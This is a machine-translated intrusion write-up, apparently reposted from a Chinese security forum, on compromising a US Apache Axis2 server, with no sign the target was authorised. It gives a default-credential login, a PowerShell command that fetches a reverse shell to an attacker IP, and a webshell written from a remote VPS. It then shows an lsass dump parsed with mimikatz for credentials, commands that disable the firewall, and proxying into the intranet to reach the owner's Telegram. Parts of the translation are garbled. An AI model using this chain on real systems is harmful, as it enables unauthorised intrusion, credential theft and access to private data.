Title: Bypass Killer and win the target site

0x01 Target

country='US' app='APACHE-Axis' Picking up some fish that misses the net from the old hole, and there may be unexpected harvests

The target appears

Still a familiar page, a familiar port

Then try to log in by default password, OK, it's stable

Collect information first

Don't just deploy the package. First look at the existing services. Basically, 99.9999% of the weak passwords like this have been dealt with.

Uploading the package will be an extravagant move, you can use it directly

After searching for a circle, I didn't find any remaining horses

Find the absolute path to upload it yourself

C:/elocker/webapps/admin/WEB-INF/classes

After a quick test, I can actually go out of the Internet and don’t need to pass the shell. I just took out the cs

Execute the command

It failed to see the result

0x02 rebound shell

Is it because the powershell command is not executed successfully because it is executed in the url?

With this question, try the rebound shell

The result is still a failure. It can be confirmed that there should be a waff

0x03 Write to shell

x.x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txtpath=C:\elocker\webapps\admin\axis2-web\shell.jsp

Check out the process

Discover a security guard through comparison

0x04 Bypass Killer

Through testing, it was found that the most basic net user cannot be executed.

There are only 2 roads in front of you

Make a password without killing and decisive choice to capture passwords, which is simple and effective.

Mimikatz cannot be used directly

Here I use procdump to export the memory file of the lsas process locally, and then use mimikatz to read the password locally.

Upload procdump64.exe and download lsass.dmp

Then parse the file locally

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# Export as lsass.dump file

mimikatz.exe 'sekurlsa:minidump lsass.dmp' 'sekurlsa:logonPasswords full' exit

# Put lsass.dmp in the mimikatz directory to use

Get hash, crack the password

0x05 Login to the server

Check the firewall status

Netsh Advfirewall show allprofiles to turn off firewall

NetSh Advfirewall set allprofiles state off

Intranet IP, need to build an agent

0x06 Log in to the cloud desktop and find unexpected surprises

Found that the owner is running telegram, hey

0x07 Summary

1. Search for vulnerability targets through fofa' syntax country='US' app='APACHE-Axis' 2. Found a background of axis2, and the page has a weak password (admin/axis2) 3. Upload in the background Upload the AxisInvoker.aar package at the service 4. The absolute path to query the website is: C:/elocker/webapps/admin/WEB-INF/classeshttp://www.xxx.com/axis2/services/AxisInvoker/info5. Try to generate a poseshell backdoor program through cs, triggered by accessing the following address, but the access failed (there may be a soft-killing block in the system) http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=dir%20C: 6. Write to Malaysia http://www.xxx.com/axis2/services/AxisInvoker/download?url=http://vps/data.txtfile=C:\elocker\webapps\admin\axis2-web\shell.jsp7. Execute tasklist in Malaysia, and found that there are 360tary (360 antivirus) and zhudongfangyu.exe (security guard) 8. Upload an Ice Scorpion's household talk Trojan in Malaysia, then connect and execute the command net user error. 9. Here, upload procdump64.exe through Ice Scorpion, and execute the command to export lsass.dmpprocdump64.exe -accepteula -ma lsass.exe lsass.dmp10. Download lsass.dmp to the local area through Ice Scorpion. 11. Import lsass.dump through mimkiatz and read out hash value mimikatz.exe 'sekurlsa:minidump lsass.dmp' 'sekurlsa:logonPasswords full' exit12. Use md5 to crack the HSAH value NTML and successfully crack the password: 123QWEqwe13. Execute the following command through Malaysia Netsh Advfirewall show allprofiles //View the firewall status NetSh Advfirewall set allprofiles state off //Close the firewall 14. Turn on the proxy through the socket function that comes with Ice Scorpion, set the Proxifier proxy locally to add MSTSC to the proxy 15. Execute mstsc through the proxy, log in to the intranet remotely, and find that the original telegram link exists: https://xz.aliyun.com/t/9856